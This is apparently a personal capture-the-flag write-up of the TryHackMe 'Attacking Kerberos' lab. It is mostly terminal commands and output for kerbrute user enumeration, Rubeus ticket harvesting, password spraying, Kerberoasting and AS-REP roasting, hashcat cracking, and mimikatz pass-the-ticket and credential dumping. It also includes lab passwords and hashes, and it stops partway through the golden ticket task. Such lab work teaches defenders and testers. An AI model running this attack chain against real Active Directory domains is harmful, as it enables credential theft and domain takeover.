THM Attacking Kerberos done
Attacking_Kerberos¶
Task 1 Introduction¶
What does TGT stand for?¶
Ticket Granting Ticket
What does SPN stand for?¶
Service Principal Name
What does PAC stand for?¶
Privilege Attribute Certificate
What two services make up the KDC?¶
AS, TGS
Deploy the Machine¶
No answer needed
Task 2 Enumeration w/ Kerbrute¶
Add address IP to /etc/hosts¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# echo "10.10.228.63 CONTROLLER.local" >> /etc/hosts
┌──(root㉿kali)-[~]
└─# cat /etc/hosts | grep CONTROLLER
10.10.228.63 CONTROLLER.local
Enumerating Users w/ Kerbrute¶
Download users list¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
--2023-03-17 07:48:53-- https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 836 [text/plain]
Saving to: ‘User.txt’
User.txt 100%[==============================================>] 836 --.-KB/s in 0s
2023-03-17 07:48:53 (31.7 MB/s) - ‘User.txt’ saved [836/836]
Download kerbrute¶
┌──(kali㉿kali)-[/tmp]
└─$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
--2023-03-17 07:43:24-- https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Enumerate¶
┌──(kali㉿kali)-[/tmp]
└─$ ./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos/User.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/17/23 - Ronnie Flathers @ropnop
2023/03/17 07:49:36 > Using KDC(s):
2023/03/17 07:49:36 > CONTROLLER.local:88
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:36 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > [+] VALID USERNAME: [email protected]
2023/03/17 07:49:37 > Done! Tested 100 usernames (10 valid) in 0.587 seconds
How many total users do we enumerate?¶
10
What is the SQL service account name?¶
sqlservice
What is the second "machine" account name?¶
machine2
What is the third "user" account name?¶
user3
Task 3 Harvesting & Brute-Forcing Tickets w/ Rubeus¶
Login to host - ssh¶
Username: Administrator
Password: P@$$W0rd
Domain: controller.local
┌──(kali㉿kali)-[/tmp]
└─$ ssh [email protected]
The authenticity of host '10.10.228.63 (10.10.228.63)' can't be established.
ED25519 key fingerprint is SHA256:MJ0mfCQOQV99jJLs4F9riigTRyr0ECpBPVSQrP0jz80.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.228.63' (ED25519) to the list of known hosts.
[email protected]'s password:
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@CONTROLLER-1 C:\Users\Administrator>
Harvesting Tickets w/ Rubeus¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe harvest /interval:30
______ _ (_____ \ | |
_____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/ v1.5.0
[*] Action: TGT Harvesting (with auto-renewal)[*] Monitoring every 30 seconds for new TGTs
[*] Displaying the working TGT cache every 30 seconds
[*] Refreshing TGT ticket cache (3/17/2023 5:26:24 AM)
User : [email protected]
StartTime : 3/17/2023 3:22:41 AM
EndTime : 3/17/2023 1:22:41 PM
RenewTill : 3/24/2023 3:22:41 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
cmJ0Z3QbEENPTlRST0xMRVIuTE9DQUyjggQoMIIEJKADAgESoQMCAQKiggQWBIIEEs3FimZh8ybbq1+nywi2mgF607M/sLplFTWY
...
Add IP to C:\Windows\System32\drivers\etc\hosts¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>echo 10.10.228.63 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
Brute-Forcing / Password-Spraying w/ Rubeus¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe brute /password:Password1 /noticket
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[-] Blocked/Disabled user => Guest
[-] Blocked/Disabled user => krbtgt
[+] STUPENDOUS => Machine1:Password1
[*] base64(Machine1.kirbi):
doIFWjCCBVagAwIBBaEDAgEWooIEUzCCBE9hggRLMIIER6ADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPTlRST0xMRVIubG9jYWyjggQDMIID/6ADAgESoQMCAQKiggPx
BIID7QrctgTwc1kIXYljcA1WOpn5lLuw7l5GPmfnKpL609Ay1DVxUF7uMVXx1cLmPUJSl+sGbKblgOs2
qzh5nluU0xpe+73hSrqeD6n4sLhwYlD0mYN31qE890aY7GmvQ9+2DqeoA0N+JaZqnKgU6huDRb5q+vHU
jYf2zF06QKxG69ux8IsajZbDnmIEkxpElcdHLPKQGz8+nDZhQjo7FQ6iW0OAtJCzkhx5E17jojZrVsxl
GPrZzTGixt7ELI2T76XAD9GoqUHGhuWLJbLXd0H7+CNV/hkcPCpGiz5Y1sdGCpQXhf1OVsXga6DeRADk
6ydWLh5zykMoJ9kdhz23sHGoS1uNSQo0N/4n79cDNNhdjupNYIBjAJIoq7Z7xwZhx0oXLLOVxf7VWQo3
ERAcKYhTSwFkC/yEY327ZJ0xJ13MUKcI3+5B+72pdcnluTnRrCSjw0aGaODbmRzJ//fCq5LQRZq/+JW7
IaLEzGtoJXu+No+WC5wPnxyrMh7VAP+5bt+8zNlydpJvqXW63W0URSX6054G8l4pJaBLk5Xp96JQOgmP
eYtts3k6w4cCIS9RrcfOFcAKszN9+FfdQ2C5XkhKjh6Ux2c3KCWeYh9LBv49nnW12p4mZYzoawkmzzgj
4QMaoapGGlWKwtXd/CiGLydYpVjTeBPFktD01XPqIA3a2xMFA6G7JCVU9WBDhGVu7vQRF9ZHvyqSa08a
0pg51IdhZtooB1UwLFjCBpWtCxkMzQoaxRlvvHiDdCF6k21ci8jKXbHEtlZ3SGzHVh3mCgAOobyn8KwL
873vGLuIRDJkox6UCvQvq4L3qQ3LqF7RQ8j3k3ekZS58ivIyCpRZYH596PruUDmwMrk6htqEN8M+zTr/
YyOqbX7vtJOSFTeJmKMNKimVVV0tOGZXLta0EQ+9E+hFjB8Y9HMIBuYK2y3yjoTAio2HRse3qbS6wgh1
DvWzAPnFSbEFSCmpUKfvqY2tdQDtafhCcnak2EB64v4S62ZbR6sX7BVKGY9MfrqbBS3+L5EqbQcaw5hM
5vB+bVfwhCyPv9sEfYV4wilI4nFKeheMhCQ6VV+2V+SpTdh3w0eM8AOruNHfy4IuaLC1La0rm5yDGn+C
2w3TSMC+JNEWauSPjGSJLYNveFYQFxoWNYDIMzguSWI7f2F4LCrTnqrh6WYqITQBU9nuuRWFxEHzqw4+
khnfvyIBs8gMh0HeVVx9H+JSixUHaIYbTBSmsHbdyW+KES7rKr5Mkhs+U/NOVOgsPPM5gr3UJoR8XnYS
hfod03jeQAE66yLYyjcopctKf3Re9XFdD1Entkze81HjXDcdmSEzj/8ZRpOdU19EU6OB8jCB76ADAgEA
ooHnBIHkfYHhMIHeoIHbMIHYMIHVoCswKaADAgESoSIEIF6gnIZnyjyBpNqJLpUrPsCC2aQmSjBVa4n0
/5yN1TCfoRIbEENPTlRST0xMRVIuTE9DQUyiFTAToAMCAQGhDDAKGwhNYWNoaW5lMaMHAwUAQOEAAKUR
GA8yMDIzMDMxNzEyMzExN1qmERgPMjAyMzAzMTcyMjMxMTdapxEYDzIwMjMwMzI0MTIzMTE3WqgSGxBD
T05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLmxvY2Fs
[+] Done
Which domain admin do we get a ticket for when harvesting tickets?¶
Administrator
Which domain controller do we get a ticket for when harvesting tickets?¶
CONTROLLER-1
Task 4 Kerberoasting w/ Rubeus & Impacket¶
Method 1 - Rubeus¶
Dump the Kerberos hash¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
[*] SamAccountName : SQLService
[*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet : 5/25/2020 10:28:26 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca
l:30111*$FD1E802CA0633199C38C758AB15C7F5A$64169C86D00E48678B395F76C7B872FD1F7D1F
B512E4D7BFD8428F0A84B9F3921B909D95B099F543C404923E6DA1CF5B61D8F9EF90B22E84FE7A21
34D647107CA794B0B54743A6E09164AA4DD8A5024FE19CA1C730C2FE7FA66B63A11E0CEE9416889B
897D91C228C8C25D9531A3592C5D6711B9FEAFFC755F5F2E4FC2652DD9EC3C66D48FC270CC1902F1
C3FA4D3911790BCA0A78FD9EF0DCEA386AA6BA496D81C5FC39D6DC49D0D0BBE6569D5DCAB7080F73
1FC4E7B9A5A743D0373EE31A33066031C0A9E891A3C9BDDC7A5264935CB9AA53D26528A33CE1B6D6
BA7FF0F70F65E521591FA4095F3DE359A1613B81E78B0B5680D4ACD98FA9CF8E235D916DEF78E51E
855D07B117287494C0A13047EF864E8FD1CABCD7416790AB06D614FF85058A09B4826ED63B45BAE4
A143B96C34540AB3487D9AE02780B5E4B450CD8E63DD6CBEB5D0F260764ABD0D2A7D00A191D82162
320EE2C054F5C69C3E156E46ED198F6D36A6BF24DB7453BD9D4DC23CCA85BCF7F03629487971A844
7A2312C82F65BC6C3BDE2892260C830889639AB984B953E2AE73C282D146346856636E6D6CE45F2C
0A496D97F5212FF433A186766D472B93A4755934C2261881338C64651DD0B6C6D1B4B599AA3B271A
8997F09A5B92B0F2EE9C524BA8918BF25728F0F2440FD6B8B88A211D82528C230AB56ABBC6DEDED8
CD0881EDA59366C72CB677FFB67ED3EE7CE76BB9BCAF3B13C13CFFE69696E8B112CA9FAD0DDB3670
6F606CFFF6215C45FEBD393721E8741F0C01D37D10CCF63E70E25CA885CFF968113A5D98668F0AFE
2F801C9C8CBAAF896FF2F3A10B558F1FE1249D8D9A0FBE47061BD424DE5BD0197857B72D463461BF
79294DA5F522E90AAC73477C7F16FD683A8217924F876DCE39A19FBD111539702D9C1B1ED5AF0D97
DC308C78AA2AF57E77858C449C12271AA41ABF4B12DF29EACB3BB67CA5D7710D6E60A69505A3A3F7
55A91CAA1CC254345AB90F8D30BC233C4E1ACEA08C4F4FDAA3C886C5769B3A47E0AEAAABEE18ED42
FE212F37C36FBA9C0DAD0369DF5561F4B1BCADF3F209B9B885AE96608738CFA1D752A2410F18FDE7
D9CB05317F08F483C669CDBF7F680B87FD824A66AD4E20129AC68DB04FD86BB2A36E216971470C4A
46FA554E32E299B1F2D4208945D4CFD3B51034FC0F178B7DE5259842AF2E8BD0924A0CB6654894AA
63B5C0B33A2CA812266CD59A9AB8799E0713A28FEACCC86BB3095436691DA8D8356B55F1EC40590F
6BCD9FC3A7B0C2C357FDB23B5A7076379513A813DD29535CBC429B059A2B020702EF58E66D1B172A
9E87103B0CBB9E0761B1BB2301F23477BF40C938AF8FF5976FC141529B4BD1E842F1B1CF09C6C340
1A0397855CB1F3FBF158A2B52F7AAB3A1C8BE1B86BD1A22D821FD92E012C394C20874EFC9DBDB51C
80AD5D54486EE7F9CD409F5DB3870FFA87BF42DF4B1E7E8D700DB891CBFF45F3C2D134D1B1E2506F
055AD66DA4558485F540D4391DBFA99D59FB22618FD12F366CEADB184F1008412F28DD863179530B
973E37AA1E3811DC702D185C313B53812401A113C5E8233ED907B173A131C66C99AB46381A4A9F3B
C181E9D88C91E51522B5725DBA9DF3C1EC7860E76D8CA3DCA7F60C8CCC
[*] SamAccountName : HTTPService
[*] DistinguishedName : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet : 5/25/2020 10:39:17 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
cal:30222*$C9BCD76DEFFC6352CE1126ECDD35088F$F4BD0187327E9662871438C202A7AA67745A
42DEA2C7702D99CED898ABEF2F81F0B98862E7B56CB86C7095E5F0D18FFDB4F69F434C0F170348CE
4250A7241C4C99E9CFF6934D6DAAFF61CBCA83FE73D6C193581729A7EDE5A1F334E74E39F4014872
90BAE3C0C2DFC17740FEC0847870EEFBD30DF20EE178405EEF4BC366729859730C6476B48E86F929
2A9D79FFE331FDFDC5B108B99B776CC5A6841508C147A2B5A8D7D29E0212CC2D72FF9367126512DD
83EC4F33240B45F6F5BA32652359B87C5962E89A38A47665F37B91449BD9C000B735EF4A240E4B7A
C830BDF7CDBDCE46B2DB4D43BAB3CF8F603BAAB10914FA5AF74B738FAB8FBC62601D1021CD383665
1D6C823B0A8233CB6B4FB5121731E8630FDC61879A4463D14A831F8701C69023CD09718AF3379EFA
83994C2500B16C2B5172108D2C1B2300D90DBD2F059B1F1FBAE1DF07248053FDA724FA5E52B58AB7
F774E79A1921FEAAFA9ABC538747DC913F709CB73CA9D06FA2B99125F10DE09F6433A8CBF76E1DB8
F4FEB7F1AC1AC08CB865014B28D5B46C9F69E81DA7FB5F9D1886E1E4A05AEDC821A647EE0EDB19EE
99CA8E0DC0889BCCF5AD947F3E67660B0F615A0D667F01E75BCDC634BE4ED712FD3CB73B4EA0B144
3730122A268FF0701E7A1B0E56DE32D973C089979F76AB998BA2BA75AC0BB0B17845DABA4495775C
694F64B8D243DC2F28CDC786C5E26799E21E3FE80E24A2A6128AD506D96318F6BD7FF0E35E0659AB
C53EB2CA202EE44619ED3493BAF8757DF7B59888D93B5D168AEE4A7088F42C80762FAB104FCB371D
2E2311BB1562D00A53130B74063C5EA55D59D8CD6E5F76EAEE83A98BDDBF2D68B3571921126B1DA2
2298CBC1084D2198FBC712FBD11825D6DC6237BEB40635BD489F7DF913E366D7C7CA3638FD0B0333
C30797A2913850916FC473E3AEEE8D94768DE8AA445BB8D30B613C7C4D49B0DA2F34192CB4B546FE
9BD35DCDB6E9388EC759DEAA6B61E78B3A2BC66AE6D25DF599871E3B376A3DD02EA7CC88D8E0F30C
7F0600C520588BBCE05805BDA508247BBD087AAF7F1AA8CA2EC229764CBD5321F4D24E0DE665494B
3F2508A203D18AF20EEEE33CAC23EC2064DD76F572B69BEC7530AC51E173AD8711A27A84AE1A8BAD
AA760F06A09C211D2B2951C0B1605048FDFDDF4E0E5D65924274D863ADACF6A21AF38F40A4C2F9AD
293F126EE51BB8360838AB832E87AC21AB6E6F00E9F8FD22BE070D82A887C7D1BE3D1620C41B89F6
1BD9A58D0925D70B6ADFA6C1389DB53E6B1811BE72308BFA4762498FEA6A005429D1762E427334CC
026EC926112FDC4AE1490A9C2242078A30F71AC6E2E02297FF49A12C465090A46B6ACD28CC6A2587
2DE366602468A4C291A8BFCD660FC760942630A81ABE9649DE54E0553B18047141BB4DD669B5D9D7
CDFD1709418FD80FC5A12F672186F6704EFEEB65562D4A1F5120A94C1189BEAA56794AE8C576EFF9
257D0609F2F76A2185FABDEE5FAB749688940C78CBFD0BACF14300EDB8B83495549433CB25E8F2E4
838237993AF9361CF11AD620F795755D58D1DD7ABD532D7BC0BA4C04B0D1D0CF8E8CF0C0BCD5C1FF
1C1616D1AF7566A24F2257E0BB526F8899911D91CE7ADE040EC0237D04C2
Download custom password list¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
--2023-03-17 08:50:03-- https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9706 (9.5K) [text/plain]
Saving to: ‘Pass.txt’
Pass.txt 100%[==============================================>] 9.48K --.-KB/s in 0.02s
2023-03-17 08:50:04 (555 KB/s) - ‘Pass.txt’ saved [9706/9706]
Cracking hash¶
Copy and prepare hash¶
Copy and past hash to local VM and clear
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ cat HTTPService_hash.txt | tr -d " " | tr -d "\n" > HTTPService_hash_clear.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ cat SQLService_hash.txt | tr -d " " | tr -d "\n" > SQLService_hash_clear.txt
Cracking hash¶
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 13100 -a 0 HTTPService_hash_clear.txt Pass.txt --show
$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$c9bcd76deffc6352ce1126ecdd35088f$f4bd0187327e9662871438c202a7aa67745a42dea2c7702d99ced898abef2f81f0b98862e7b56cb86c7095e5f0d18ffdb4f69f434c0f17
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 13100 -a 0 SQLService_hash_clear.txt Pass.txt --show
$krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*$fd1e802ca0633199c38c758ab15c7f5a$64169c86d00e48678b395f76c7b872fd1f7d1fb512e4d7bfd8428f0a84b9f3921b909d95b099f543c404923e6da1cf5b61d8f9ef90b22e84
What is the HTTPService Password?¶
Summer2020
What is the SQLService Password?¶
MYPassword123#
Task 5 AS-REP Roasting w/ Rubeus¶
Dumping KRBASREP5 Hashes w/ Rubeus -¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>Rubeus.exe asreproast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : CONTROLLER.local
[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName : Admin2
[*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::7c5c:25d1:d138:eadb%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:0BEAE08D21742BC46F7A247BFEA24466$04C25D71EAF5
E0783AA2B551CC94607E9DAB65DF451F29CAB4AA0E9F736C67D0E7D4432D93EDF5C324CC79591826
59BF23E9F1E08EE0798051DF438C10E1841B4AE2C8CBDB189D72B69C2D435724A824E04AD5F3B15D
5AF393F8E158305106281E2723B7A2A48A0476E57730FD8E0FFE3B7391101E94DAEA282C148625A3
48AD42DF28CDA58A72F4796AE05D24323E576761DCCE141AFF57ED29790E484B22A2F9615C66DCC4
A6807304D309A40EE59DA224D656DBBFACB8A61EBBBF4CA0043CE779399C3CD34E1A1749B568ECEB
657F03E5337CF886722AA94140C60F7539137ECA3C35DA701E9B48DFFA01E8008E3D96FC0912
[*] SamAccountName : User3
[*] DistinguishedName : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::7c5c:25d1:d138:eadb%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
[email protected]:E74847ACB8ACCEC38A5354383EA90A41$0F22855518A16
66EB7D59FE4DAF8D052C509125F0809103C71BF6E27410306FD311D030B0AFDCE8FC2043BDBE45BC
3E5F38512ABAF509AD70293310C4D561C6EEC90FC5AEFEFCC40DC0A47F0FF38E4F9709EF83522A36
6DAF7D23E01CA75839E02316B4BEF0536A5A62DFB65F105B8EEE0F63F7E6E9C414211E1DECB75087
435FAE8BB05F85471344DF94753013B2F34CF5F8C0CD8693FCAE5CA46DE31BF27338F25CEF892A1A
E48E935FF20DF65B123ED2B9ED9C36DC71919787E9D910841EC156F0F403A084F3EC604D8B984FB4
37A952516209441D70BB898A537E07184F0AE40E36356502FA8BFE948F2FAF6A811411B74B4
Crack those Hashes w/ hashcat -¶
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 18200 Admin-2.hash_clear.txt Pass.txt
...
[email protected]:0beae08d21742bc46f7a247bfea24466$04c25d71eaf5e0783aa2b551cc94607e9dab65df451f29cab4aa0e9f736c67d0e7d4432d93edf5c324cc7959182659bf23e9f1e08ee0798051df438c10e1841b4ae2c8cbdb189d72b69c2d435724a824e04ad5f3b15d5af393f8e158305106281e2723b7a2a48a0476e57730fd8e0ffe3b7391101e94daea282c148625a348ad42df28cda58a72f4796ae05d24323e576761dcce141aff57ed29790e484b22a2f9615c66dcc4a6807304d309a40ee59da224d656dbbfacb8a61ebbbf4ca0043ce779399c3cd34e1a1749b568eceb657f03e5337cf886722aa94140c60f7539137eca3c35da701e9b48dffa01e8008e3d96fc0912:P@$$W0rd2
...
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_Attacking_Kerberos]
└─$ hashcat -m 18200 User-3.hash_clear.txt Pass.txt
...
[email protected]:e74847acb8accec38a5354383ea90a41$0f22855518a1666eb7d59fe4daf8d052c509125f0809103c71bf6e27410306fd311d030b0afdce8fc2043bdbe45bc3e5f38512abaf509ad70293310c4d561c6eec90fc5aefefcc40dc0a47f0ff38e4f9709ef83522a366daf7d23e01ca75839e02316b4bef0536a5a62dfb65f105b8eee0f63f7e6e9c414211e1decb75087435fae8bb05f85471344df94753013b2f34cf5f8c0cd8693fcae5ca46de31bf27338f25cef892a1ae48e935ff20df65b123ed2b9ed9c36dc71919787e9d910841ec156f0f403a084f3ec604d8b984fb437a952516209441d70bb898a537e07184f0ae40e36356502fa8bfe948f2faf6a811411b74b4:Password3
...
What hash type does AS-REP Roasting use?¶
Kerberos 5, etype 23, AS-REP
Which User is vulnerable to AS-REP Roasting?¶
User3
What is the User's Password?¶
Password3
Which Admin is vulnerable to AS-REP Roasting?¶
Admin2
What is the Admin's Password?¶
P@$$W0rd2
Task 6 Pass the Ticket w/ mimikatz¶
Prepare Mimikatz & Dump Tickets -¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 409275 (00000000:00063ebb)
Session : Network from 0
User Name : CONTROLLER-1$
Domain : CONTROLLER
Logon Server : (null)
Logon Time : 3/17/2023 6:39:04 AM
SID : S-1-5-18
* Username : CONTROLLER-1$
* Domain : CONTROLLER.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
[00000000]
Start/End/MaxRenew: 3/17/2023 6:34:22 AM ; 3/17/2023 4:34:22 PM ;
List dumped tickets¶
Pass the Ticket w/ Mimikatz¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # kerberos::ptt [0;49729][email protected]
* File: '[0;49729][email protected]': OK
Read cached tickets¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>klist
Current LogonId is 0:0x49729
Cached Tickets: (1)
#0> Client: Administrator @ CONTROLLER.LOCAL
Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 3/17/2023 6:37:00 (local)
End Time: 3/17/2023 16:37:00 (local)
Renew Time: 3/24/2023 6:37:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Verification if I can read admin$¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>dir \\localhost\admin$
Volume in drive \\localhost\admin$ has no label.
Volume Serial Number is E203-08FF
Directory of \\localhost\admin$
01/03/2021 08:36 AM <DIR> .
01/03/2021 08:36 AM <DIR> ..
09/15/2018 12:19 AM <DIR> ADFS
05/25/2020 02:58 PM <DIR> ADWS
09/15/2018 12:19 AM <DIR> appcompat
09/06/2019 05:31 PM <DIR> apppatch
05/25/2020 02:55 PM <DIR> AppReadiness
05/25/2020 03:41 PM <DIR> assembly
09/15/2018 12:19 AM <DIR> bcastdvr
09/15/2018 12:12 AM 78,848 bfsvc.exe
09/15/2018 12:19 AM <DIR> Boot
I understand how a pass the ticket attack works¶
No answer needed
Task 7 Golden/Silver Ticket Attacks w/ mimikatz¶
Dump the krbtgt hash - SQLService¶
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:SQLService
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 00000455 (1109)
User : SQLService
* Primary
NTLM : cd40c9ed96265531b21fc5b1dafcfb0a
LM :
Hash NTLM: cd40c9ed96265531b21fc5b1dafcfb0a
ntlm- 0: cd40c9ed96265531b21fc5b1dafcfb0a
lm - 0: 7bb53f77cde2f49c17190f7a071bd3a0
...
Dump the krbtgt hash - Administrator¶
mimikatz # lsadump::lsa /inject /name:Administrator
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 000001f4 (500)
User : Administrator
* Primary
NTLM : 2777b7fec870e04dda00cd7260f7bee6
LM :
Hash NTLM: 2777b7fec870e04dda00cd7260f7bee6
* Kerberos
